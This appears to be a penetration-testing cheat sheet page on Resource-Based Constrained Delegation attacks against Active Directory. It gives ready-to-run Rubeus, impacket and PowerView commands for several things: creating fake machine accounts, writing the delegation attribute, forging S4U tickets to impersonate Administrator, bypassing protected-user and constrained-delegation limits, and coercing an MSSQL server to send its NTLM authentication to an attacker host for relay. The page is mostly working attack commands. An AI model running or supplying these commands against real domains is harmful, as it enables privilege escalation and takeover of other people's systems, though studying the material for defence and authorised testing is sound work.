Resource-Based Constrained Delegation (RBCD)

Object: msDS-AllowedToActOnBehalfOfOtherIdentity

Tools: rbcd.py , rubeus.exe , getST , addcomputer.py

With RBCD, this is the resource machine (the machine that receives delegation) which has a list of services that can delegate to it. This list is specified in the attribute msds-allowedtoactonbehalfofotheridentity and the computer can modified its own attribute (really usefull in NTLM relay attack scenario).

Requirements

The DC has to be AT LEAST a Windows Server 2012 and later
Domain users can create some machine, ms-ds-machineaccountquota MUST NOT be 0!
GenericAll or GenericWrite on Domain Controller

To verify

Get-DomainObject -Identity "dc=domain,dc=local" -Domain domain.local

3) Write rights on the target machine (GenericAll, GenericWrite, AllExtendedRights)

Target computer, object must NOT have the attribute msds-allowedtoactonbehalfofotheridentity set
```
Get-NetComputer ws01 | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity
```

Standard RBCD

The attacker has compromised ServiceA and wants to compromise ServiceB. He also has sufficient rights to configure msds-allowedtoactonbehalfofotheridentity on ServiceB.

1) Add RBCD from ServiceA to ServiceB

Set-ADComputer ServiceB -PrincipalsAllowedToDelegateToAccount ServiceA$

2) Verify property

Get-NetComputer ServiceB | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity

3) Get ServiceA TGT and then S4U

rubeus -x tgtdeleg /nowrap
rubeus -x s4u /user:ServiceA$ /ticket:ticket.kirbi /impersonateuser:administrator /msdsspn:host/ServiceB.domain.local /domain:domain.local /altservice:cifs,host,http,winrm,RPCSS,wsman /ptt

Linux

1) Add RBCD from ServiceA to ServiceB

rbcd.py -action write -delegate-from ServiceA$ -delegate-to ServiceB$ domain.local/user1:password

2) Verify property

rbcd.py -action read -delegate-to ServiceB$ domain.local/user1:password

###Get ServiceA TGT and then S4U

getST.py -spn 'cifs/serviceB.domain.local' -impersonate administrator -hashes ':<ServiceA_NThash>' -dc-ip <DC_IP> domain.local/ServiceA$
export KRB5CCNAME=./Administrator.ccache

With machine account creation

1) Add a fake machine account in the domain

2) Add it to the msds-allowedtoactonbehalfofotheridentity attribute of the target machine

Import-Module Powermad.ps1
Import-Module PowerView.ps1

Creds if needed, to run as another user

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('domain.local\user1', $SecPassword)

Check requirements

Get-DomainObject -Identity "dc=domain,dc=local" -Domain domain.local -Credential $Cred
Get-NetComputer <target> -Domain domain.local | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity

Add the fake machine as a resource + get its SID

New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString 'Password123!' -AsPlainText -Force) -Credential $Cred -Verbose -Domain domain.local -DomainController DC.domain.local
Get-DomainComputer FAKE01 -Domain domain.local -Credential $Cred
$ComputerSid = Get-DomainComputer FAKE01 -Properties objectsid | Select -Expand objectsid

Create the new raw security descriptor

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$ComputerSid)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Add the new raw SD to msds-allowedtoactonbehalfofotheridentity

Get-DomainComputer <target> -SearchBase "LDAP://DC=domain,DC=local" -Credential $Cred | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -SearchBase "LDAP://DC=domain,DC=local" -Verbose -Credential $Cred

Check if well added

$RawBytes = Get-DomainComputer <target> -Properties 'msds-allowedtoactonbehalfofotheridentity' -Credential $Cred -SearchBase "LDAP://DC=domain,DC=local" | select -expand msds-allowedtoactonbehalfofotheridentity
(New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0).DiscretionaryAcl

Linux

Create a new Machine Account

impacket-addcomputer -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-ip DC_IP 'domain.local/user1:password'

Set the msDS-AllowedToActOnBehalfOfOtherIdentity on our new machine account

impacket-rbcd -action write -delegate-from ControlledComputer$ -delegate-to TARGET_MACHINE$ domain.local/ControlledComputer$:ComputerPassword

Get the Administrator service ticket

getST.py -spn 'cifs/dc01.domain.local' -impersonate administrator -dc-ip <DC_IP> domain.local/ControlledComputer$:ComputerPassword

export KRB5CCNAME=./Administrator.ccache

Authenticate with psexec

impacket-psexec -k -no-pass dc01.domain.local -dc-ip DC_IP

3) Use the S4USelf function with the fake machine (on an arbitrary SPN) to create a forwardable ticket for a wanted user (not protected)

4) Use the S4UProxy function to obtain a ST for the impersonated user for the wanted service on the target machine

Calculate hash

.\Rubeus.exe hash /password:Password123! /user:FAKE01$ /domain:domain.local

S4U attack

.\Rubeus.exe s4u /user:FAKE01$ /rc4:2B576ACBE6BCFDA7294D6BD18041B8FE /impersonateuser:administrator /msdsspn:cifs/<target> /domain:domain.local /ptt /dc:DC.domain.local

Skip S4U2Self

Attacker has compromised Service A, has sufficient ACLs against Service B to configure RBCD, and wants to attack Service B By social engineering or any other solution, an interesting victim authenticates to Service A with a ST Attacker dumps the ST on Service A (sekurlsa::tickets) Attacker configures RBCD from Service A to Service B as above Attacker performs S4UProxy and bypass S4USelf by providing the ST as evidence

.\Rubeus.exe s4u /user:ServiceA$ /aes256:<service_key> /tgs:"/path/to/kirbi" /msdsspn:cifs/serviceB.domain.local /domain:domain.local /ptt /dc:DC.domain.local

Linux

getST.py -spn 'cifs/serviceB.domain.local' -additional-ticket ./ticket.ccache -hashes ':<ServiceA_NThash>' -dc-ip <DC_IP> domain.local/ServiceA$

Reflective RBCD

With a TGT or the hash of a service account, an attacker can configure an RBCD from the service to itself, a run a full S4U to access the machine on behalf of another user.

Set-ADComputer ServiceA -PrincipalsAllowedToDelegateToAccount ServiceA$
.\Rubeus.exe s4u /user:ServiceA$ /aes256:<service_key> /impersonateuser:Administrator /msdsspn:cifs/serviceA.domain.local /domain:domain.local /ptt /dc:DC.domain.local

Linux

rbcd.py -action write -delegate-from ServiceA$ -delegate-to ServiceA$ -k -no-pass domain.local/ServiceA$
getST.py -spn 'cifs/serviceA.domain.local' -impersonate administrator -k -no-pass -dc-ip <DC_IP> domain.local/ServiceA$

Impersonate protected user via S4U2Self request

It is possible to impersonate a protected user with the S4USelf request if we have a TGT (or the creds) of the target machine (for example from an Unconstrained Delegation).

With the target TGT it is possible to realise a S4USelf request for any user and obtain a ST for the service. In case where the needed user is protected against delegation, S4USelf will still work, but the ST is not forwardable (so no S4UProxy possible) and the specified SPN is invalid...however, the SPN is not in the encrypted part of the ticket. So it is possible to modify the SPN and retrieve a valid ST for the target service with a sensitive user (and the ST PAC is well signed by the KDC).

.\Rubeus.exe s4u /self /impersonateuser:Administrator /ticket:doIFFz[...SNIP...]TE9DQUw=  /domain:domain.local /altservice:cifs/server.domain.local /ptt

Linux

getST.py -self -altservice 'cifs/serviceA.domain.local' -impersonate administrator -k -no-pass -dc-ip <DC_IP> domain.local/ServiceA$

Bypass Constrained Delegation restrictions with RBCD

Attacker compromises ServiceA and ServiceB ServiceB is allowed to delegate to time/ServiceC (the target) without protocol transition (no S4USelf) Attacker configures RBCD from ServiceA to ServiceB and performs a full S4U attack to obtain a forwardable ST for the Administrator to ServiceB Attacker reuses this forwardable ST as evidence to realise a S4UProxy attack from ServiceB to time/ServiceC Since the service is not protected in the obtained ticket, the attacker can change the ST from the previous S4UProxy execution to cifs/ServiceC

RBCD from A to B

Set-ADComputer ServiceB -PrincipalsAllowedToDelegateToAccount ServiceA$
.\Rubeus.exe s4u /user:ServiceA$ /aes256:<serviceA_key> /impersonateuser:Administrator /msdsspn:cifs/serviceB.domain.local /domain:domain.local /dc:DC.domain.local

S4UProxy from B to C with the obtained ST as evidence

.\Rubeus.exe s4u /user:ServiceB$ /aes256:<serviceB_key> /tgs:<obtained_TGS> /msdsspn:time/serviceC.contoso.local /altservice:cifs /domain:domain.local /dc:DC.domain.local /ptt

Linux

RBCD from A to B

rbcd.py -action write -delegate-from ServiceA$ -delegate-to ServiceB$ -hashes ':<ServiceA_NThash>' domain.local/ServiceA$
getST.py -spn 'cifs/serviceB.domain.local' -impersonate administrator -hashes ':<ServiceA_NThash>' -dc-ip <DC_IP> domain.local/ServiceA$

S4UProxy from B to C with the obtained ST as evidence

getST.py -spn 'cifs/serviceC.domain.local' -additional-ticket ./administrator.ccache -hashes ':<ServiceB_NThash>' -dc-ip <DC_IP> domain.local/ServiceB$

U2U RBCD with SPN-less accounts

In case where you have sufficient rights to configure an RBCD on a machine (for example with an unsigned authentication coerce via HTTP) but ms-ds-machineaccountquota equals 0, there is no ADCS with the HTTP endpoint and the Shadow Credentials attack is not possible (domain level to 2012 for example), you can realize a RBCD from a SPN-less user account.

1) Configure the machine account to trust the user account you control (NTLM Relay, with the machine account's creds,...)

2) Obtain a TGT for the user via pass-the-hash:

   .\Rubeus.exe asktgt /user:user1 /rc4:<NT_hash> /nowrap

3) Request a Service Ticket via U2U (S4USelf request) with the previous TGT specified in /tgs: (additional ticket added to the request body identifying the target user account) and /ticket: (authentication). If U2U is not used, the KDC cannot find the account's LT key when a UPN is specified instead of a SPN. The account to impersonate via the future S4U request is also present:

   .\Rubeus.exe asktgs /u2u /ticket:TGT.kirbi /tgs:TGT.kirbi /targetuser:Administrator /nowrap

4) Retrieve the TGT session key in HEX format

   import binascii, base64
   print(binascii.hexlify(base64.b64decode("<TGT_SESSION_KEY_B64>")).decode())

6) Now, change the user's long term key (his RC4 NT hash actually) to be equal to the TGT session key. The ST sent in the S4UProxy is encrypted with the session key, but the KDC will try to decipher it with the user's long term key, this is why the LT key must be equal to the session key (WARNING !!! The user's password is now equal to an unknown value, you have to use a sacrificial account to realise this attack).

   smbpasswd.py -newhashes :sessionKey 'domain.local'/'user1':'Password123!'@'DC'

7) Realize the S4UProxy request with the previous S4USelf U2U ticket (ciphered with the session key) as additional ticket and the original TGT as ticket:

   .\Rubeus.exe s4u /msdsspn:cifs/target.domain.local /ticket:TGT.kirbi /tgs:U2U.kirbi

8) Finally, use this ticket to do whatever you want!

Linux

1) Configure the machine account to trust the user account you control (NTLM Relay, with the machine account's creds,...). Obtain a TGT for the user via pass-the-hash and extract the session key from it with this

getTGT.py -hashes :$(pypykatz crypto nt 'password') 'domain.local'/'user1'
describeTicket.py 'user1.ccache' | grep 'Ticket Session Key'

2) ow, change the user's long term key (his RC4 NT hash actually) to be equal to the TGT session key. The ST sent in the S4UProxy will be encrypted with the session key, but the KDC will try to decipher it with the user's long term key, this is why the LT key must be equal to the session key (WARNING !!! The user's password is now equal to an unknown value, you have to use a sacrificial account to realise this attack).

smbpasswd.py -newhashes :sessionKey 'domain.local'/'user1':'password'@'DC'

3) Realize the S4USelf request with a U2U request. If U2U is not used, the KDC cannot find the account's LT key when a UPN is specified instead of a SPN. Then, use the ticket obtained in the U2U S4USelf request (ciphered with the session key), to perform a S4UProxy request.

KRB5CCNAME='user1.ccache'
getST.py -k -no-pass -u2u -impersonate "Administrator" -spn "cifs/target.domain.local" 'domain.local'/'user1'

Finally, use the obtained ST to dump the machine LSA and SAM registers with secretsdump.

RBCD from MSSQL Server

If we have sufficient access to a MSSQL server we can use the xp_dirtree in order to leak the Net-NTLM hash of the machine account. Additionally, the Web Service client must be running on the machine in order to trick the authentication from SMB to HTTP and avoid the NTLM signature (authentication must be sent to @80):

1) Create a DNS record in order to be able to leak the NTLM hash externally

2) Use the xp_dirtree (or xp_fileexist) function to the created DNS record on @80. This will force the authentication and leak the hash

3) Relay the machine hash to the LDAP server to add a controlled account (with a SPN for the further S4USelf request) to the msDS-AllowedToActOnBehalfOfOtherIdentity of the target machine

4) Now we can ask a ST for a user we want to impersonate for a service on the machine

Add the DNS

Invoke-DNSUpdate -DNSType A -DNSName attacker.domain.local -DNSData <attacker_IP> -Realm domain.local

On our machine, waiting for the leak

#https://gist.github.com/3xocyte/4ea8e15332e5008581febdb502d0139c

python rbcd_relay.py 192.168.24.10 domain.local 'target$' <controlledAccountWithASPN>

ON the MSSQL server

SQLCMD -S <MSSQL_instance> -Q "exec master.dbo.xp_dirtree '\\attacker@80\a'" -U Admin -P Admin

After the attack, ask for a ST with full S4U

.\Rubeus.exe s4u /user:<controlled_account> /rc4:<hash> /impersonateuser:Administrator /msdsspn:cifs/<target> /domain:domain.local /dc:DC.domain.local /ptt

Linux

Add the DNS

python3 dnstool.py -u 'domain.local\user1' -p 'password' -r 'attacker.domain.local' -d '<attacker_IP>' --action add <DC_IP>

On our machine, waiting for the leak

#https://gist.github.com/3xocyte/4ea8e15332e5008581febdb502d0139c

python rbcd_relay.py 192.168.24.10 domain.local 'target$' <controlledAccountWithASPN>

ON the MSSQL server

SQLCMD -S <MSSQL_instance> -Q "exec master.dbo.xp_dirtree '\\attacker@80\a'" -U Admin -P Admin

After the attack, ask for a ST with full S4U

getST.py -spn cifs/target.domain.local -impersonate admininistrator -dc-ip <DC_IP> domain.local/<controlledAccountWithASPN>password

1) addcomputer.py

addcomputer.py -computer-name 'COMPUTER_NAME' -computer-pass 'COMPUTER_PASSWORD' -dc-host DC -domain-netbios DOMAIN_NETBIOS 'DOMAIN/USER:PASSWORD' (Add computer account)

2) Rubeus

rubeus.exe hash /password:COMPUTER_PASS /user:COMPUTER /domain:DOMAIN

rubeus.exe s4u /user:FAKE_COMPUTER$ /aes256:AES_256_HASH /impersonateuser:administrator /msdsspn:cifs/VICTIM.DOMAIN.LOCAL /altservice:krbtgt,cifs,host,http,winrm,RPCSS,wsman,ldap /domain:DOMAIN.LOCAL/ptt (System/Admin access)

3) rbcd.py

impacket-rbcd -delegate-to 'TARGET$' -dc-ip 'DC' -action 'read' 'domain'/'USER':'PASSWORD' (Try to read the attribute)

impacket-rbcd -delegate-from 'COMPUTER$' -delegate-to 'TARGET$' -dc-ip 'DC' -action 'write' DOMAIN/USER:PASSWORD

getST.py -spn 'cifs/DC_FQDN' 'DOMAIN/COMPUTER_ACCOUNT:COMPUTER_PASS' -impersonate Administrator -dc-ip DC_IP (Get TGT ticket)

4) Powermad

import-module powermad 

New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose (Create a new computer object)

Get-DomainComputer fake01 (Check our newly created computer and get its SID)

Create a new raw security descriptor for the FAKE01 computer principal

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-2552734371-813931464-1050690807-1154)"

$SDBytes = New-Object byte[] ($SD.BinaryLength)

$SD.GetBinaryForm($SDBytes, 0)

Apply the security descriptor bytes to the target machine

Get-DomainComputer TARGET_COMPUTER | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

(New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0).DiscretionaryAcl (Test if the security descriptor assigned to target computer in msds-allowedtoactonbehalfofotheridentity attribute refers to the fake01$ machine. If yes, we shall see the SID of our created computer)

Then use Rubeus or getST to impersonate an account on our target computer of our choice

PreviousEnumerating Kerberos Delegations NextUnconstrained Delegation

Last updated 3 months ago

hashtagResource-Based Constrained Delegation (RBCD)

hashtagObject: msDS-AllowedToActOnBehalfOfOtherIdentity

hashtagTools: rbcd.py , rubeus.exe , getST , addcomputer.py

hashtagRequirements

hashtagStandard RBCD

hashtag1) Add RBCD from ServiceA to ServiceB

hashtag2) Verify property

hashtag3) Get ServiceA TGT and then S4U

hashtagLinux

hashtag1) Add RBCD from ServiceA to ServiceB

hashtag2) Verify property

hashtagWith machine account creation

hashtag1) Add a fake machine account in the domain

hashtag2) Add it to the msds-allowedtoactonbehalfofotheridentity attribute of the target machine

hashtagLinux

hashtag3) Use the S4USelf function with the fake machine (on an arbitrary SPN) to create a forwardable ticket for a wanted user (not protected)

hashtag4) Use the S4UProxy function to obtain a ST for the impersonated user for the wanted service on the target machine

hashtagSkip S4U2Self

hashtagLinux

hashtagReflective RBCD

hashtagLinux

hashtagImpersonate protected user via S4U2Self request

hashtagLinux

hashtagBypass Constrained Delegation restrictions with RBCD

hashtagLinux

hashtagU2U RBCD with SPN-less accounts

hashtag1) Configure the machine account to trust the user account you control (NTLM Relay, with the machine account's creds,...)

hashtag2) Obtain a TGT for the user via pass-the-hash:

hashtag4) Retrieve the TGT session key in HEX format

hashtag7) Realize the S4UProxy request with the previous S4USelf U2U ticket (ciphered with the session key) as additional ticket and the original TGT as ticket:

hashtag8) Finally, use this ticket to do whatever you want!

hashtagLinux

hashtag1) Configure the machine account to trust the user account you control (NTLM Relay, with the machine account's creds,...). Obtain a TGT for the user via pass-the-hash and extract the session key from it with this

hashtag3) Realize the S4USelf request with a U2U request. If U2U is not used, the KDC cannot find the account's LT key when a UPN is specified instead of a SPN. Then, use the ticket obtained in the U2U S4USelf request (ciphered with the session key), to perform a S4UProxy request.

hashtagRBCD from MSSQL Server

hashtag1) Create a DNS record in order to be able to leak the NTLM hash externally

hashtag2) Use the xp_dirtree (or xp_fileexist) function to the created DNS record on @80. This will force the authentication and leak the hash

hashtag3) Relay the machine hash to the LDAP server to add a controlled account (with a SPN for the further S4USelf request) to the msDS-AllowedToActOnBehalfOfOtherIdentity of the target machine

hashtag4) Now we can ask a ST for a user we want to impersonate for a service on the machine

hashtagLinux

hashtagCreate a new raw security descriptor for the FAKE01 computer principal

hashtagApply the security descriptor bytes to the target machine

hashtagThen use Rubeus or getST to impersonate an account on our target computer of our choice